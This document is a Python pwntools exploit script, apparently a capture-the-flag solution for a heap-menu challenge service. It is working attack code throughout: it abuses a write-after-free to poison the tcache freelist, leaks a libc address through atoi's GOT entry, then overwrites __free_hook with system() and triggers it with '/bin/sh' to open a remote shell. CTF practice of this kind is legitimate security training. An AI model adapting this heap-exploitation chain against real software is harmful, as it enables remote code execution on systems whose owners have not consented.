#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#Utils
def add():
    """Pick menu item 1 (allocate a new entry) on the module-level tube ``io``."""
    choice = '1'
    io.sendlineafter('> ', choice)
def edit(idx, data):
    """Pick menu item 2 and overwrite entry ``idx`` with ``data``.

    ``data`` is sent raw (``sendafter``, no trailing newline), so callers
    append their own ``b'\\n'`` when the service expects one.
    """
    choice = '2'
    io.sendlineafter('> ', choice)
    io.sendlineafter('?\n', str(idx))
    io.sendafter('URL?\n', data)
def delete(idx):
    """Pick menu item 3 and free entry ``idx``."""
    choice = '3'
    io.sendlineafter('> ', choice)
    io.sendlineafter('?\n', str(idx))
def list():
    """Pick menu item 4 and return the raw bytes printed up to ``b'otal'``.

    NOTE: the name shadows the builtin ``list``; it is kept because the
    exploit body below calls it by this name.
    """
    choice = '4'
    io.sendlineafter('> ', choice)
    listing = io.recvuntil('otal')
    return listing
#Addr
atoi_got = 0x403fd0        # presumably atoi's GOT slot in the (non-PIE) target — TODO confirm with ELF('./cttt').got['atoi']
# Offsets below were hand-copied and look like Ubuntu 18.04 glibc 2.27 values — TODO confirm
# against libc.symbols['atoi'] / ['system'] / ['__free_hook'] before running.
libc = ELF('./libc.so.6')  # challenge libc; in this script it is only referenced for a local LD_PRELOAD run
atoi_offset = 0x40680
system_offset = 0x4f440
__free_hook = 0x3ed8e8
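if __name__ == '__main__':
    # Local run: swap the remote() line for
    #   io = process('./cttt', env={'LD_PRELOAD': libc.path})
    io = remote('challenges.ctfd.io', 30252)

    # Stage 1: leak libc.  Allocate two entries and free both, then use
    # edit() on the *freed* entry 2 (a write-after-free) to overwrite its
    # tcache next pointer with atoi@GOT.  The next two add()s then return
    # chunk 2 and, after it, a "chunk" whose user data is the GOT slot.
    # This relies on the freed chunk staying writable through edit() and on
    # tcache not validating the poisoned pointer (pre-2.29 behaviour).
    for _ in range(2):
        add()                                   # entries 1 and 2
    delete(1)
    delete(2)
    edit(2, p64(atoi_got) + b'\n')              # tcache fd -> atoi@GOT
    add()                                       # 3: reuses chunk 2
    add()                                       # 4: user data == atoi@GOT

    # list() prints entry 4's "URL", i.e. the resolved address of atoi.
    raw = list().split(b'\n')[6].split(b')')[1].replace(b' ', b'')
    libc_leak = u64(raw.ljust(8, b'\0'))
    libc_base = libc_leak - atoi_offset
    # Fail fast if the menu output changed and the parse above picked up
    # garbage: a real libc base is page-aligned, and continuing with a bogus
    # base would write system()'s address into an arbitrary location.
    if libc_base & 0xfff:
        log.error(f'bad libc leak {libc_leak:#x} (base {libc_base:#x} not page-aligned); '
                  'check the list() parsing / atoi_offset')
    print(hex(libc_base))

    # Stage 2: same tcache poisoning, this time steering an allocation onto
    # __free_hook - 8 so a single edit() writes "/bin/sh\0" (first 8 bytes of
    # the chunk) followed by system() into the hook itself.
    delete(3)
    edit(3, p64(libc_base + __free_hook - 0x8) + b'\n')
    add()                                       # 4: reuses chunk 3
    add()                                       # 5: user data == __free_hook - 8
    edit(5, b'/bin/sh\0' + p64(libc_base + system_offset) + b'\n')
    # free(entry 5) -> __free_hook(ptr) == system(ptr), and ptr points at "/bin/sh".
    delete(5)
    io.interactive()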